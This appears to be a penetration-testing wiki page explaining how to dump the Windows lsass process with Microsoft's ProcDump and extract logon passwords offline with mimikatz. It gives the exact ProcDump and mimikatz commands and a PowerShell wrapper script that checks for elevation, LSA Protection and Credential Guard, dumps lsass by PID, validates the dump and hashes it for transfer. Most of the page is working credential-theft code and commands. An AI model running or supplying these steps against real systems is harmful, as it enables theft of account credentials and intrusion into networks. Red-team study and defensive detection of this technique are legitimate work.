# Dumping the lsass process with a Microsoft-signed tool

First, run [Procdump](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) from an elevated (administrator) prompt to dump the process memory. ProcDump is a legitimate Microsoft-signed binary, so it tends to pass signature-based allow-listing, but other antivirus products may still block it. The method worked on Windows versions before Defender Tamper Protection; on current systems, Defender's ASR rule "Block credential stealing from the Windows local security authority subsystem" and LSA Protection (RunAsPPL) stop the dump regardless of who signed the binary, because lsass cannot be opened with PROCESS_VM_READ by a non-protected process.

```
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
```

Then copy lsass.dmp back to your own machine and parse it offline with mimikatz. Use a mimikatz build of the same architecture as the dumped lsass (x64 for a 64-bit target), otherwise `sekurlsa::minidump` refuses the file.

```
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
```
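The two manual commands above skip the checks that decide whether the dump will be usable. The PowerShell wrapper below is an added example for this page (not part of ProcDump, mimikatz or the original write-up): it verifies elevation, reads the `RunAsPPL` value and the Credential Guard status that would make the dump fail or come back empty, runs ProcDump by PID, confirms the output really is a minidump (`MDMP` magic), and records a SHA-256 so the copy can be checked after transfer. The `$ProcDumpPath` and `$OutFile` parameters are this example's own assumptions.

```powershell
# Added example: wrapper around the ProcDump step. Assumes Procdump64.exe sits in the
# current directory (override with -ProcDumpPath) and writes lsass.dmp to %TEMP%.
param(
    [string]$ProcDumpPath = ".\Procdump64.exe",
    [string]$OutFile      = "$env:TEMP\lsass.dmp"
)

# 1. Must be elevated: opening lsass needs SeDebugPrivilege, which only admins hold.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw "Run this from an elevated prompt."
}

# 2. LSA Protection: with RunAsPPL=1 lsass runs as a Protected Process Light and a
#    normal process (ProcDump included) cannot open it with PROCESS_VM_READ.
$lsaKey = "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa"
$ppl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
if ($ppl -eq 1) {
    Write-Warning "RunAsPPL is set: expect ProcDump to fail with 'Access is denied'."
}

# 3. Credential Guard: the dump may succeed but sekurlsa::logonpasswords returns
#    almost nothing, because secrets live in the isolated LSA process instead.
#    In Win32_DeviceGuard, SecurityServicesRunning value 1 means Credential Guard.
$dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard `
                      -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
if ($dg -and ($dg.SecurityServicesRunning -contains 1)) {
    Write-Warning "Credential Guard is running: the dump will hold few or no credentials."
}

# 4. Resolve lsass by PID so ProcDump is not fooled by a similarly named process.
$lsass = Get-Process -Name lsass -ErrorAction Stop | Select-Object -First 1

# 5. Same flags as the manual command: -accepteula suppresses the EULA dialog,
#    -ma writes a full memory dump (sekurlsa needs the full dump, not a minidump).
& $ProcDumpPath -accepteula -ma $lsass.Id $OutFile | Out-Null
if (-not (Test-Path $OutFile)) {
    throw "ProcDump wrote no file; see its console output above."
}

# 6. Sanity check before moving the file: a Windows dump starts with the bytes "MDMP".
$fs = [System.IO.File]::OpenRead($OutFile)
try {
    $hdr = New-Object byte[] 4
    [void]$fs.Read($hdr, 0, 4)
} finally {
    $fs.Close()
}
if ([System.Text.Encoding]::ASCII.GetString($hdr) -ne "MDMP") {
    throw "$OutFile does not have a minidump header."
}

# 7. Size and hash, so the copy on the analysis machine can be verified.
Get-Item $OutFile | Select-Object Name, Length
Get-FileHash -Algorithm SHA256 -Path $OutFile
```

After `Get-FileHash` reports the same digest on the analysis machine, run the mimikatz command above against the copied file; the `-ma` flag matters because `sekurlsa::minidump` needs the full process memory, not a stack-only dump.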

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FmSYLjID7VlMEqdYkt7S0%2F1674996072855.png?alt=media&#x26;token=dba73564-6f05-4f92-8ac8-0ca45e80a079" alt=""><figcaption></figcaption></figure>

